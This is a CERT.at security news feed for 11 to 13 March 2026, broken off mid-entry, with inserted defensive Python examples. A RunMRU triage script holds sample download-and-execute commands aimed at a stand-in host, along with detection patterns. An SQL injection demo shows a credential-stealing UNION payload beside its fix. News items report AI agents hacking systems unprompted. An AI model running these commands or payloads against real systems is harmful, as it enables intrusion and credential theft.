<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/"><title>CERT.at - Daily reports</title><link rel="alternate" href="https://www.cert.at"/><subtitle>This feed contains the daily reports from www.CERT.at</subtitle><entry><title>Daily summary - 13.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-13032026"/><author><name>CERT.at</name></author><updated>2026-03-13T18:12:18Z</updated><published>2026-03-13T18:12:18Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 12-03-2026 18:00 - Friday 13-03-2026 18:00
Handler:     Guenes Holler
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Investigating a New Click-Fix Variant&lt;/h3&gt;

Atos researchers identified a new variant of the popular ClickFix technique, in which attackers convince the user to execute a malicious command on their own device via the Win + R shortcut.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html&quot;&gt;https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html&lt;/a&gt;
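Whatever the lure looks like, the command the victim types or pastes into the Win + R dialog is recorded by Explorer in the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which makes that key a cheap triage point on a suspected host. The Python below is an added example written for this digest, not code from Atos or from CERT.at: the RunMRU values are constructed, and the indicator patterns are a generic assumption about ClickFix-style command lines rather than a description of what this particular variant runs.

```python
"""Triage Windows RunMRU values for ClickFix-style commands (added example)."""
import re

# Constructed sample, shaped like an export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# each slot holds the typed command followed by a literal "\1",
# and MRUList lists the slots from most to least recent.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -ep bypass -c "irm https://example.invalid/v | iex"\\1',
    "c": "mshta https://example.invalid/verify.hta\\1",
}

# Binaries a ClickFix lure typically makes the user launch (assumption, extend as needed).
LOLBINS = {
    "powershell", "pwsh", "mshta", "cmd", "curl", "certutil", "bitsadmin",
    "wscript", "cscript", "rundll32", "regsvr32", "msiexec", "conhost",
}

# Command-line traits worth flagging; none is proof on its own, the combination is.
INDICATORS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download cradle": re.compile(
        r"\b(irm|iwr|invoke-(rest|web)method|downloadstring|curl|certutil\s+-urlcache)\b", re.I),
    "inline execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote url": re.compile(r"https?://", re.I),
}


def parse_runmru(values):
    """Return (slot, command) pairs in MRU order with the trailing '\\1' removed."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, cmd))
    return entries


def triage(values):
    """Flag RunMRU commands that launch a LOLBin and show at least one ClickFix trait."""
    findings = []
    for slot, cmd in parse_runmru(values):
        words = cmd.strip().split()
        if not words:
            continue
        # Reduce 'C:\Windows\System32\mshta.exe' or '"powershell.exe"' to its bare name.
        binary = words[0].strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe")
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if binary in LOLBINS and hits:
            findings.append({"slot": slot, "binary": binary, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f"[{f['slot']}] {f['binary']}: {', '.join(f['indicators'])}")
        print("    " + f["command"])
```

On a live system the same dictionary can be filled from a registry export of the key for each user profile; the MRUList order tells you which command was entered last, which is usually the one that matters.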

&lt;hr&gt;

&lt;h3&gt;Rogue AI agents can work together to hack systems and steal secrets&lt;/h3&gt;

AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)&lt;/h3&gt;

On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32794&quot;&gt;https://isc.sans.edu/diary/rss/32794&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a suspected artificial intelligence (AI)-generated malware codenamed Slopoly put to use by a financially motivated threat actor named Hive0163.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html&quot;&gt;https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ivanti EPMM &quot;Sleeper Shells&quot; not so sleepy?&lt;/h3&gt;

In late January 2026 an advisory covering two remote code execution vulnerabilities (CVE-2026-1281 &amp; CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) was published. Shortly afterwards, reports (for example by Tenable) mentioned publicly available proof-of-concept exploits.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.nviso.eu/2026/03/13/ivanti-epmm-sleeper-shells-not-so-sleepy/&quot;&gt;https://blog.nviso.eu/2026/03/13/ivanti-epmm-sleeper-shells-not-so-sleepy/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;&quot;Handala Hack&quot; - Unveiling Group's Modus Operandi&lt;/h3&gt;

Handala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor that is known for multiple destructive wiping attacks combined with &quot;hack and leak&quot; operations. The threat actor operates several online personas, with the most prominent among them being Homeland Justice, maintained from mid-2022 specifically for multiple attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/&quot;&gt;https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;6 Malicious Packagist Themes Ship Trojanized jQuery and FUNNULL Redirect Payloads&lt;/h3&gt;

Six malicious Packagist packages posing as OphimCMS themes contain trojanized jQuery that exfiltrates URLs, injects ads, and loads FUNNULL-linked redirects.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery?utm_medium=feed&quot;&gt;https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery?utm_medium=feed&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Multiple security vulnerabilities in AppArmor (&quot;CrackArmor&quot;) - updates available&lt;/h3&gt;

Security researchers at Qualys have discovered a total of nine vulnerabilities in AppArmor, which the experts collectively refer to as &quot;CrackArmor&quot;.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/aktuelles/2026/3/mehrere-sicherheitslucken-in-apparmor-crackarmor-updates-verfugbar&quot;&gt;https://www.cert.at/de/aktuelles/2026/3/mehrere-sicherheitslucken-in-apparmor-crackarmor-updates-verfugbar&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Veeam warns of critical flaws exposing backup servers to RCE attacks&lt;/h3&gt;

Data protection company Veeam Software has patched multiple flaws in its Backup &amp; Replication solution, including four critical remote code execution (RCE) vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chrome emergency update: two actively exploited code-execution holes plugged&lt;/h3&gt;

Google released an emergency update for Chrome overnight into Friday. It plugs two security holes that are being attacked in the wild.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11209626&quot;&gt;https://heise.de/-11209626&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Veeam Backup &amp; Replication: critical code-execution vulnerabilities discovered&lt;/h3&gt;

Veeam is closing several critical security vulnerabilities in Backup &amp; Replication with updates. They allow remote code execution.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11209818&quot;&gt;https://heise.de/-11209818&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Friday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1062775/&quot;&gt;https://lwn.net/Articles/1062775/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-13T18:12:18Z</dc:date></entry><entry><title>Daily summary - 12.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-12032026"/><author><name>CERT.at</name></author><updated>2026-03-12T19:08:04Z</updated><published>2026-03-12T19:08:04Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 11-03-2026 18:00 - Thursday 12-03-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;New PhantomRaven NPM attack wave steals dev data via 88 packages&lt;/h3&gt;

New attack waves from the PhantomRaven supply-chain campaign are hitting the npm registry, with dozens of malicious packages that exfiltrate sensitive data from JavaScript developers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;US disrupts SocksEscort proxy network powered by Linux malware&lt;/h3&gt;

Law enforcement agencies in the U.S. and Europe along with private partners have disrupted the SocksEscort cybercrime proxy network that used only edge devices compromised via the AVRecon malware for Linux.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/&quot;&gt;https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Full access in two hours: AI agent hacks McKinsey's AI platform on its own&lt;/h3&gt;

Researchers set an AI agent loose on McKinsey's Lilli platform. It was able to read millions of chat messages and other data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/vollzugriff-in-zwei-stunden-ki-agent-hackt-eigenstaendig-ki-plattform-von-mckinsey-2603-206407.html&quot;&gt;https://www.golem.de/news/vollzugriff-in-zwei-stunden-ki-agent-hackt-eigenstaendig-ki-plattform-von-mckinsey-2603-206407.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;When your IoT Device Logs in as Admin, It's too Late!&lt;/h3&gt;

Have you ever installed a new device on your home or company router? Even when setup instructions are straightforward, end users often skip the step that matters most: changing default credentials. The excitement of deploying a new device frequently outweighs the discipline of securing it.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32788&quot;&gt;https://isc.sans.edu/diary/rss/32788&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Trick Perplexity's Comet AI Browser Into Phishing Scam in Under Four Minutes&lt;/h3&gt;

Agentic web browsers that leverage artificial intelligence (AI) capabilities to autonomously execute actions across multiple websites on behalf of a user could be trained and tricked into falling prey to phishing and scam traps.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html&quot;&gt;https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Six Android Malware Families Target Pix Payments, Banking Apps, and Crypto Wallets&lt;/h3&gt;

Cybersecurity researchers have discovered half-a-dozen new Android malware families that come with capabilities to steal data from compromised devices and conduct financial fraud.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html&quot;&gt;https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Exploit kit threat: Apple updates older iOS and iPadOS versions&lt;/h3&gt;

Overnight into Thursday, Apple released important updates for users of iOS and iPadOS 15 and 16. They should be installed quickly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Exploitkit-Gefahr-Apple-aktualisiert-aeltere-iOS-und-iPadOS-Versionen-11208159.html&quot;&gt;https://www.heise.de/news/Exploitkit-Gefahr-Apple-aktualisiert-aeltere-iOS-und-iPadOS-Versionen-11208159.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Taming the dragon: reverse engineering firmware with Ghidra&lt;/h3&gt;

I stumbled into infosec the same year the NSA graced us with Ghidra. It's by far become the most used tool in my arsenal for reverse engineering and vulnerability research. It's free, extensible, and supports some of the quirkier architectures we come across. But its learning curve is steep. This blog post is the culmination of my learnings from spending what may be too many hours in front of Ghidra's glaring and dated UI.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pentestpartners.com/security-blog/taming-the-dragon-reverse-engineering-firmware-with-ghidra/&quot;&gt;https://www.pentestpartners.com/security-blog/taming-the-dragon-reverse-engineering-firmware-with-ghidra/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Subscription trap on your mobile phone bill: how to respond correctly&lt;/h3&gt;

Is your mobile phone bill suddenly higher than usual? A look at the bill reveals the reason: a subscription you never knowingly signed up for. Such cost traps occur again and again. We explain what is behind them and what you can do about it.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/abo-falle-auf-der-handyrechnung-so-reagieren-sie-richtig/&quot;&gt;https://www.watchlist-internet.at/news/abo-falle-auf-der-handyrechnung-so-reagieren-sie-richtig/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;International cybercrime network dismantled, 700 victims in Austria&lt;/h3&gt;

Thousands of private routers had been hijacked. They were used to carry out anonymous attacks on IT systems and to distribute child sexual abuse material.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000312309/internationales-cybercrime-netz-zerschlagen-700-opfer-in-214sterreich&quot;&gt;https://www.derstandard.at/story/3000000312309/internationales-cybercrime-netz-zerschlagen-700-opfer-in-214sterreich&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Announcing Pwn2Own Berlin for 2026&lt;/h3&gt;

Willkommen zurück, meine Damen und Herren, zu unserem zweiten Wettbewerb in Berlin! That's correct (if Google Translate didn't steer me wrong). After our inaugural competition last year, Pwn2Own returns to Berlin and OffensiveCon. Outside of our shipping troubles, we had an amazing time and can't wait to get back. Last year, we added Artificial Intelligence as a category with great results.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026&quot;&gt;https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A Nerd's Life: Weeks of Firmware Teardown to Prove We Were Right&lt;/h3&gt;

This blog post is a follow-up to our previous post describing how we managed to extract the firmware of a smartwatch. It contains many references and details introduced in our previous post; readers are therefore advised to read it first.
&lt;p /&gt;
&lt;A HREF=&quot;http://blog.quarkslab.com/nerd-life-weeks-firmware-teardown-we-were-right.html&quot;&gt;http://blog.quarkslab.com/nerd-life-weeks-firmware-teardown-we-were-right.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Intune Compromise Allows Attackers to Remotely Wipe Medical Supply Company Devices&lt;/h3&gt;

A hacktivist group with links to Iran's intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker's largest hub outside of the United States, said the company sent home more than 5,000 workers there today.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/&quot;&gt;https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;SQLi flaw in Elementor Ally plugin impacts 250k+ WordPress sites&lt;/h3&gt;

An SQL injection vulnerability in Ally, a WordPress plugin from Elementor for web accessibility and usability with more than 400,000 installations, could be exploited to steal sensitive data without authentication.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/&quot;&gt;https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/&lt;/a&gt;
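Stated generically, this is the classic shape of an unauthenticated SQL injection: a request parameter is concatenated into the query text, and a UNION lets the caller read tables the endpoint was never meant to expose. The snippet below is an added example on SQLite, not the plugin's code; the schema, rows and payload are constructed, and the fix shown (coerce to the expected type, then bind) is the same idea as $wpdb->prepare() with a %d placeholder in WordPress.

```python
"""Unauthenticated SQL injection: a vulnerable lookup beside its parameterized fix (added example)."""
import sqlite3

# Constructed stand-in for a plugin's database; nothing here is the real schema.
SCHEMA = """
CREATE TABLE widgets(id INTEGER PRIMARY KEY, label TEXT);
CREATE TABLE users(id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO widgets VALUES (1, 'skip to content'), (2, 'contrast toggle');
INSERT INTO users VALUES (1, 'admin', '$P$Bconstructedhash00000000000000');
"""

# What an unauthenticated caller might send in place of a numeric id.
PAYLOAD = "1 UNION SELECT user_login || ':' || user_pass FROM users"


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, widget_id):
    """Concatenates caller input into the statement: the input becomes SQL grammar."""
    sql = f"SELECT label FROM widgets WHERE id = {widget_id}"
    return [row[0] for row in con.execute(sql)]


def lookup_fixed(con, widget_id):
    """Coerces to the expected type and binds it: the input can only ever be a value."""
    return [row[0] for row in con.execute(
        "SELECT label FROM widgets WHERE id = ?", (int(widget_id),))]


def leaked_credentials(con):
    """Rows the injected UNION pulls out of the users table through the widgets endpoint."""
    return [r for r in lookup_vulnerable(con, PAYLOAD) if ":" in r]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    try:
        lookup_fixed(db, PAYLOAD)
    except ValueError as err:
        print("fixed rejects payload:", err)
```

The point of the fixed version is that the only thing the caller controls is a bound integer; the UNION never reaches the SQL parser, and a non-numeric value is rejected before any query runs.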

&lt;hr&gt;

&lt;h3&gt;Zero Click Unauthenticated RCE in n8n: A Contact Form That Executes Shell Commands&lt;/h3&gt;

Pillar Research team found a zero-click, unauthenticated RCE in n8n. Anyone who can reach a public multi-step form with HTML rendering can execute shell commands on the server. We worked with the n8n team to fix it. If you use n8n Cloud, you're already protected. If you're self-hosting, update to 2.10.1 / 2.9.3 / 1.123.22 now.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands&quot;&gt;https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Aruba switches with AOS-CX: attackers can reset the admin password&lt;/h3&gt;

HPE's network operating system Aruba Networking AOS-CX is vulnerable. The developers have closed several security vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Aruba-Switches-mit-AOS-CX-Angreifer-koennen-Admin-Passwort-zuruecksetzen-11208000.html&quot;&gt;https://www.heise.de/news/Aruba-Switches-mit-AOS-CX-Angreifer-koennen-Admin-Passwort-zuruecksetzen-11208000.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;HP PCs: attackers can gain elevated privileges via UEFI flaws&lt;/h3&gt;

HP computers can be attacked via several vulnerabilities in UEFI and Device Manager.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/HP-PCs-Angreifer-koennen-sich-hoehere-Rechte-ueber-UEFI-Luecken-verschaffen-11208417.html&quot;&gt;https://www.heise.de/news/HP-PCs-Angreifer-koennen-sich-hoehere-Rechte-ueber-UEFI-Luecken-verschaffen-11208417.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Zoom: network attacks on critical vulnerability possible&lt;/h3&gt;

Zoom's video conferencing software contains several security vulnerabilities, some of them critical. Attackers from the network can escalate privileges.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Zoom-Videokonferenzsoftware-ermoeglicht-Angreifern-Rechteausweitung-11208902.html&quot;&gt;https://www.heise.de/news/Zoom-Videokonferenzsoftware-ermoeglicht-Angreifern-Rechteausweitung-11208902.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Thursday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1062570/&quot;&gt;https://lwn.net/Articles/1062570/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-12T19:08:04Z</dc:date></entry><entry><title>Daily summary - 11.03.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/3/tagesberichte-11032026"/><author><name>CERT.at</name></author><updated>2026-03-11T18:36:41Z</updated><published>2026-03-11T18:36:41Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 10-03-2026 18:00 - Wednesday 11-03-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Analyzing &quot;Zombie Zip&quot; Files (CVE-2026-0866), (Wed, Mar 11th)&lt;/h3&gt;

A new vulnerability (CVE-2026-0866) has been published: Zombie Zip. It's a method to create a malformed ZIP file that will bypass detection by most anti-virus engines. The malformed ZIP file cannot be opened with a ZIP utility; a custom loader is required. [..] I will show you how to use my tools to analyze such a malformed ZIP file.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32786&quot;&gt;https://isc.sans.edu/diary/rss/32786&lt;/a&gt;
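A ZIP that stock tools refuse but a custom loader still unpacks is, by construction, one whose internal structures disagree with each other, so the useful first step is to walk the container yourself instead of trusting whichever structure a scanner happens to parse. The Python below is an added example for this digest, not the diary author's tools and not a description of how CVE-2026-0866 specifically malforms a file: it walks the end-of-central-directory record, every central directory entry and the local header each entry points at, and reports where they disagree. The sample archive and the corruption applied to it are constructed.

```python
"""Walk a ZIP container and report disagreements between its structures (added example)."""
import io
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDH_SIG = b"PK\x01\x02"    # central directory file header
LFH_SIG = b"PK\x03\x04"    # local file header


def u16(buf, off):
    return int.from_bytes(buf[off:off + 2], "little")


def u32(buf, off):
    return int.from_bytes(buf[off:off + 4], "little")


def walk_zip(data):
    """Return a list of anomalies; an empty list means the structures agree."""
    issues = []
    eocd = data.rfind(EOCD_SIG)
    if eocd == -1:
        return ["no end-of-central-directory record"]
    total = u16(data, eocd + 10)
    cd_size = u32(data, eocd + 12)
    cd_off = u32(data, eocd + 16)
    tail = eocd + 22 + u16(data, eocd + 20)          # EOCD plus its comment
    if len(data) > tail:
        issues.append(f"{len(data) - tail} bytes appended after the EOCD record")
    if cd_off + cd_size > eocd:
        issues.append("central directory does not fit before the EOCD record")
        return issues
    pos, seen = cd_off, 0
    while total > seen:
        if data[pos:pos + 4] != CDH_SIG:
            issues.append(f"central directory entry {seen} at {pos} has a bad signature")
            return issues
        method, crc = u16(data, pos + 10), u32(data, pos + 16)
        csize, usize = u32(data, pos + 20), u32(data, pos + 24)
        fnlen, exlen, clen = u16(data, pos + 28), u16(data, pos + 30), u16(data, pos + 32)
        lho = u32(data, pos + 42)
        name = data[pos + 46:pos + 46 + fnlen]
        label = name.decode("utf-8", "replace")
        if lho + 30 > len(data) or data[lho:lho + 4] != LFH_SIG:
            issues.append(f"{label}: local header at {lho} is missing or has a bad signature")
        else:
            # Bit 3 of the flags means sizes/CRC live in a trailing data descriptor, so 0 is legal there.
            descriptor = (u16(data, lho + 6) // 8) % 2 == 1
            local = {"method": u16(data, lho + 8), "crc": u32(data, lho + 14),
                     "csize": u32(data, lho + 18), "usize": u32(data, lho + 22)}
            central = {"method": method, "crc": crc, "csize": csize, "usize": usize}
            for field, cval in central.items():
                if cval != local[field] and not (descriptor and field != "method"):
                    issues.append(f"{label}: {field} is {cval} in the central directory but "
                                  f"{local[field]} in the local header")
            lf_fnlen = u16(data, lho + 26)
            if data[lho + 30:lho + 30 + lf_fnlen] != name:
                issues.append(f"{label}: local header carries a different file name")
            data_end = lho + 30 + lf_fnlen + u16(data, lho + 28) + csize
            if data_end > cd_off:
                issues.append(f"{label}: compressed data would run into the central directory")
        pos += 46 + fnlen + exlen + clen
        seen += 1
    if pos != cd_off + cd_size:
        issues.append("central directory size in EOCD does not match the entries walked")
    return issues


def make_sample_zip():
    """Constructed, well-formed archive with one deflated member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.js", "// constructed sample member\nconsole.log('hi');\n")
    return buf.getvalue()


def break_local_header(data):
    """Constructed malformation: wipe the local header signature. The central directory,
    which directory-only scanners trust, stays intact; a stock unzipper fails on the member."""
    lfh = data.find(LFH_SIG)
    return data[:lfh] + b"\x00\x00\x00\x00" + data[lfh + 4:]


def stock_tool_rejects(data):
    """True if Python's own zipfile cannot extract the first member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(zf.namelist()[0])
        return False
    except zipfile.BadZipFile:
        return True


if __name__ == "__main__":
    good, bad = make_sample_zip(), break_local_header(make_sample_zip())
    print("intact  :", walk_zip(good) or "no anomalies", "| stock tool rejects:", stock_tool_rejects(good))
    print("mangled :", walk_zip(bad), "| stock tool rejects:", stock_tool_rejects(bad))
```

The walker deliberately reads both the central directory and the local headers, because the two are redundant copies of the same metadata and a loader can choose to believe either one; any field that differs between them, data that spills past the directory, or bytes after the EOCD record is where a custom loader has room to hide something a single-structure parser never sees.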

&lt;hr&gt;

&lt;h3&gt;Claude Tried to Hack 30 Companies. Nobody Asked It To.&lt;/h3&gt;

We gave AI agents simple research tasks on cloned corporate websites. When the legitimate path was broken, the agents autonomously discovered and exploited SQL injection vulnerabilities to complete the task - with zero hacking instructions in any prompt.
&lt;p /&gt;
&lt;A HREF=&quot;https://trufflesecurity.com/blog/claude-tried-to-hack-30-companies-nobody-asked-it-to&quot;&gt;https://trufflesecurity.com/blog/claude-tried-to-hack-30-companies-nobody-asked-it-to&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sextortion &quot;I recorded you&quot; emails reuse passwords found in disposable inboxes&lt;/h3&gt;

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people that use the FakeMailGenerator service. [..] My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/news/2026/03/sextortion-i-recorded-you-emails-reuse-passwords-found-in-disposable-inboxes&quot;&gt;https://www.malwarebytes.com/blog/news/2026/03/sextortion-i-recorded-you-emails-reuse-passwords-found-in-disposable-inboxes&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Bitpanda trap: warning about an unauthorized wallet transfer is a phishing attempt!&lt;/h3&gt;

For some time now, criminals have been using the financial service provider Bitpanda as a cover for a massive phishing wave. Using notifications about allegedly unauthorized wallet transfers or withdrawal attempts, they put pressure on their victims. The goals are access to the bank account and the approval of transfers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/bitpanda-wallet-transfer-phishing/&quot;&gt;https://www.watchlist-internet.at/news/bitpanda-wallet-transfer-phishing/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sednit reloaded: Back in the trenches&lt;/h3&gt;

In this blogpost, we have shown that Sednit's advanced development team is active once again, operating an arsenal centered on two implants - BeardShell and Covenant - deployed in tandem and each leveraging a different cloud provider. This setup enables operators to reestablish access quickly if the infrastructure for one is taken down. We believe that this dual-implant strategy is not new. [..] The Sednit group - also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy - has been operating since at least 2004.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/&quot;&gt;https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BlackSanta Malware Targets HR Staff with Fake CV Downloads&lt;/h3&gt;

It is a classic case of hackers exploiting the one thing recruiters have to do every day: open files from strangers. [..] The threat, dubbed the BlackSanta malware [..] they target the specific workflows of recruiters, sending harmless-looking emails with links to CVs on sites like Dropbox. [..] the attackers are using a technique called steganography. For your information, this involves hiding malicious code inside a normal-looking image. 
&lt;p /&gt;
